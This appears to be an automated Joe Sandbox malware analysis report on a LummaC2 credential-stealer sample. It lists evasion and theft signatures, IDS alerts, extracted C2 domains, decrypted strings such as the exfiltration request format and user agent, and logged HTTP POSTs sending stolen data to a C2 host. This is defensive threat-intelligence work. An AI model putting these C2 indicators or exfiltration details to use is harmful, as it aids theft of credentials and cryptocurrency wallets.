Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Wvo9FU4qo9.exe

Overview

General Information

Sample name:Wvo9FU4qo9.exe
renamed because original name is a hash value
Original sample name:d65dfaafd41de8a252a930da84763e79.exe
Analysis ID:1581390
MD5:d65dfaafd41de8a252a930da84763e79
SHA1:0519330da9c1f922266baddeffd933b3b0a5f705
SHA256:4448ef4ccedffb399427afd699eb2fdfbbdd74da541bf38bce45b2bab2efde42
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Wvo9FU4qo9.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\Wvo9FU4qo9.exe" MD5: D65DFAAFD41DE8A252A930DA84763E79)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["appliacnesot.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "mindhandru.buzz", "cashfuzysao.buzz", "scentniej.buzz", "inherineau.buzz", "screwamusresz.buzz"], "Build id": "PsFKDg--pablo"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.1602681941.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Wvo9FU4qo9.exe PID: 6596JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: Wvo9FU4qo9.exe PID: 6596JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: Wvo9FU4qo9.exe PID: 6596JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T14:53:24.925894+010020283713Unknown Traffic192.168.2.949706104.21.11.101443TCP
                2024-12-27T14:53:27.099697+010020283713Unknown Traffic192.168.2.949707104.21.11.101443TCP
                2024-12-27T14:53:30.119269+010020283713Unknown Traffic192.168.2.949708104.21.11.101443TCP
                2024-12-27T14:53:32.414989+010020283713Unknown Traffic192.168.2.949709104.21.11.101443TCP
                2024-12-27T14:53:34.696988+010020283713Unknown Traffic192.168.2.949710104.21.11.101443TCP
                2024-12-27T14:53:37.781848+010020283713Unknown Traffic192.168.2.949712104.21.11.101443TCP
                2024-12-27T14:53:40.357787+010020283713Unknown Traffic192.168.2.949714104.21.11.101443TCP
                2024-12-27T14:53:43.243801+010020283713Unknown Traffic192.168.2.949715104.21.11.101443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T14:53:25.686371+010020546531A Network Trojan was detected192.168.2.949706104.21.11.101443TCP
                2024-12-27T14:53:27.853969+010020546531A Network Trojan was detected192.168.2.949707104.21.11.101443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T14:53:25.686371+010020498361A Network Trojan was detected192.168.2.949706104.21.11.101443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T14:53:27.853969+010020498121A Network Trojan was detected192.168.2.949707104.21.11.101443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T14:53:30.964950+010020480941Malware Command and Control Activity Detected192.168.2.949708104.21.11.101443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Wvo9FU4qo9.exeAvira: detected
                Source: https://mindhandru.buzz:443/apiion.txtPKAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/lAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/api0Avira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/gL0Avira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/ZQAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/pi=Avira URL Cloud: Label: malware
                Source: https://mindhandru.buzz:443/apixxd8pi.default-release/key4.dbPKAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/apiryBIAvira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/%Avira URL Cloud: Label: malware
                Source: https://mindhandru.buzz/3eAvira URL Cloud: Label: malware
                Source: Wvo9FU4qo9.exe.6596.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["appliacnesot.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "mindhandru.buzz", "cashfuzysao.buzz", "scentniej.buzz", "inherineau.buzz", "screwamusresz.buzz"], "Build id": "PsFKDg--pablo"}
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Wvo9FU4qo9.exeJoe Sandbox ML: detected
                Source: 00000000.00000003.1463418410.0000000004C90000.00000004.00001000.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                Source: 00000000.00000003.1463418410.0000000004C90000.00000004.00001000.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                Source: 00000000.00000003.1463418410.0000000004C90000.00000004.00001000.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                Source: 00000000.00000003.1463418410.0000000004C90000.00000004.00001000.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                Source: 00000000.00000003.1463418410.0000000004C90000.00000004.00001000.00020000.00000000.sdmpString decryptor: inherineau.buzz
                Source: 00000000.00000003.1463418410.0000000004C90000.00000004.00001000.00020000.00000000.sdmpString decryptor: scentniej.buzz
                Source: 00000000.00000003.1463418410.0000000004C90000.00000004.00001000.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                Source: 00000000.00000003.1463418410.0000000004C90000.00000004.00001000.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                Source: 00000000.00000003.1463418410.0000000004C90000.00000004.00001000.00020000.00000000.sdmpString decryptor: mindhandru.buzz
                Source: 00000000.00000003.1463418410.0000000004C90000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000003.1463418410.0000000004C90000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000003.1463418410.0000000004C90000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000003.1463418410.0000000004C90000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000003.1463418410.0000000004C90000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000003.1463418410.0000000004C90000.00000004.00001000.00020000.00000000.sdmpString decryptor: PsFKDg--pablo
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 0_2_004C57C0 CryptUnprotectData,0_2_004C57C0
                Source: Wvo9FU4qo9.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.9:49714 version: TLS 1.2
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_004F0340
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov edx, ebx0_2_004B8600
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then lea esi, dword ptr [eax+00000270h]0_2_004B8A50
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov edi, dword ptr [esi+30h]0_2_004BCC7A
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]0_2_004F0D20
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_004DD34A
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov eax, ebx0_2_004D7440
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]0_2_004D7440
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]0_2_004F1720
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov word ptr [eax], cx0_2_004D1A10
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_004DE0DA
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_004DC0E6
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_004DC09E
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_004DC09E
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov eax, dword ptr [004F6130h]0_2_004C8169
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_004D81CC
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_004E6210
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov ecx, eax0_2_004CC300
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_004D83D8
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh]0_2_004DC465
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_004DC465
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_004D8528
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov edi, ecx0_2_004DA5B6
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]0_2_004F06F0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov byte ptr [edi], al0_2_004DC850
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then push esi0_2_004BC805
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_004D2830
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]0_2_004EC830
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov eax, ebx0_2_004CC8A0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]0_2_004CC8A0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah]0_2_004CC8A0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh]0_2_004CC8A0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_004D89E9
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h0_2_004EC990
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h0_2_004ECA40
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_004DAAC0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah]0_2_004BAB40
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov edx, ecx0_2_004C8B1B
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-6E2DD57Fh]0_2_004CEB80
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_004C4CA0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov edx, ecx0_2_004D6D2E
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then movzx esi, byte ptr [ebp+eax-46h]0_2_004EEDC1
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh0_2_004ECDF0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-3ECB279Fh]0_2_004ECDF0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh0_2_004ECDF0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h0_2_004ECDF0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov ecx, eax0_2_004D2E6D
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then jmp edx0_2_004D2E6D
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then movzx ecx, byte ptr [edx+eax]0_2_004D2E6D
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h]0_2_004B2EB0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov word ptr [eax], cx0_2_004C6F52
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov esi, ecx0_2_004D90D0
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h]0_2_004F1160
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov ecx, eax0_2_004DD17D
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_004DB170
                Source: C:\Users\user\Desktop\Wvo9FU4qo9.exeCode function: 4x nop then mov ecx, eax0_2_004DD116

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49706 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49706 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49707 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49707 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49708 -> 104.21.11.101:443
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Malware configuration extractorURLs: mindhandru.buzz
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: Joe Sandbox ViewIP Address: 104.21.11.101 104.21.11.101
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49709 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49706 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49715 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49708 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49712 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49710 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49714 -> 104.21.11.101:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49707 -> 104.21.11.101:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WUVI3FHSMML5APVA03User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12845Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5FN8ST4A6706JWPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15045Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=4FKDDQ2WHQ9K9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20549Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QX3UE1VKMK0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1178Host: mindhandru.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=A4F5BK7ZNQIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552278Host: mindhandru.buzz
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: mindhandru.buzz
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: mindhandru.buzz
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1570420563.0000000005872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1570420563.0000000005872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1641288958.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1669919961.0000000000FB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1570420563.0000000005872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1570420563.0000000005872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1570420563.0000000005872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1570420563.0000000005872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1570420563.0000000005872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1570420563.0000000005872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1570420563.0000000005872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1570420563.0000000005872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1570420563.0000000005872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1525110185.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525222713.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525039980.00000000057FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1571718696.00000000058A5000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1571675942.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1571718696.00000000058A5000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1571675942.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1525110185.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525222713.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525039980.00000000057FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1525110185.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525222713.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525039980.00000000057FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1525110185.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525222713.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525039980.00000000057FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1571718696.00000000058A5000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1571675942.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1571718696.00000000058A5000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1571675942.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Wvo9FU4qo9.exe, 00000000.00000003.1525110185.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525222713.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, Wvo9FU4qo9.exe, 00000000.00000003.1525039980.00000000057FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
